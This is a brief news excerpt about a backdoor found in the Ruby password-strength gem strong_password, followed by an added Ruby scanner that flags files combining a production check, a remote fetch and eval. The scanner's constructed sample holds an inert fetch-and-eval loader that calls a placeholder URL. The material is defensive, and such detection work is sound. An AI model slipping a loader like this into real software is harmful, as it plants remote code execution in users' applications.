From zdnet.com
A diligent developer’s security practices have uncovered a dangerous backdoor in a popular Ruby library for checking the strength of user-chosen passwords.
The malicious code would check whether the library was being used in a test or production environment. When in production, it would download and run a second payload from Pastebin.com, a text hosting portal.
This second payload would create the actual backdoor in the apps and websites that used the library — named strong_password.
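A dependency review can flag the behaviour described above by looking for its three parts in one file: a production-environment gate, a remote fetch, and dynamic code execution. The sketch below is an added example, not code from the article or from the library; the regular expressions, function names and both sample sources are constructed assumptions, and a match is a prompt for manual review rather than proof of compromise.

```ruby
# Heuristic scan of Ruby source for a staged loader: environment gate,
# remote fetch and dynamic execution all present in the same file.
# Patterns are illustrative assumptions, not signatures of any real sample.
SIGNALS = {
  env_gate: /\b(?:Rails\.env\b[^\n]*production|ENV\[['"](?:RAILS_ENV|RACK_ENV)['"]\][^\n]*production)/,
  remote_fetch: /\b(?:Net::HTTP|URI\.open|open-uri|open\s*\(\s*['"]https?:)/,
  dynamic_exec: /\b(?:eval|instance_eval|class_eval|module_eval)\b/
}.freeze

# Constructed sample: inert text with a placeholder URL, never executed.
SAMPLE_STAGED = <<~'RUBY'
  # constructed sample for the scanner
  if Rails.env.production?
    body = Net::HTTP.get(URI("https://paste.example.invalid/raw/PLACEHOLDER"))
    eval(body)
  end
RUBY

# Constructed sample: ordinary password-strength logic, no signals.
SAMPLE_BENIGN = <<~'RUBY'
  def weak?(password)
    password.length < 12 || password =~ /\A\d+\z/
  end
RUBY

# Returns { signal_name => [line numbers] } for non-comment lines.
def scan_source(source)
  hits = Hash.new { |h, k| h[k] = [] }
  source.each_line.with_index(1) do |line, lineno|
    next if line.strip.start_with?("#")
    SIGNALS.each { |name, re| hits[name] << lineno if line.match?(re) }
  end
  hits
end

# A file is flagged only when every signal appears at least once.
def suspicious?(source)
  hits = scan_source(source)
  SIGNALS.keys.all? { |name| hits.key?(name) }
end

# Walks an unpacked gem directory and returns the flagged .rb paths.
def flagged_files(root)
  Dir.glob(File.join(root, "**", "*.rb")).sort.select do |path|
    suspicious?(File.binread(path)) # binary read tolerates odd encodings
  end
end

if __FILE__ == $PROGRAM_NAME
  ARGV.each { |dir| flagged_files(dir).each { |path| puts "review: #{path}" } }
end
```

Run it against an unpacked copy of a gem before upgrading, alongside a diff of the released package against the previous version.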